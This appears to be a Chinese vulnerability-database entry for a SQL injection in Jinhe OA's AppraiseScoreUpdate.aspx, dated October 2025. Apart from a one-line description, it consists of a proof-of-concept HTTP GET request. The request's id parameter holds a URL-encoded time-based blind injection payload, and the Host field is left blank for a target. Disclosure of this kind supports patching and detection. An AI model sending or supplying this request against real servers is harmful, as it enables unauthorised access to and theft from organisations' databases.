金和OA AppraiseScoreUpdate.aspx SQL注入漏洞

日期: 2025-10-23 | 影响软件: 金和OA | POC: 已公开

漏洞描述

金和OA AppraiseScoreUpdate.aspx SQL注入漏洞

PoC代码

GET /c6/Jhsoft.Web.Appraise/AppraiseScoreUpdate.aspx/?id=%31%27%77%61%69%74%66%6f%72%20%64%65%6c%61%79%20%27%30%3a%30%3a%35%27%2d%2d HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive

相关漏洞推荐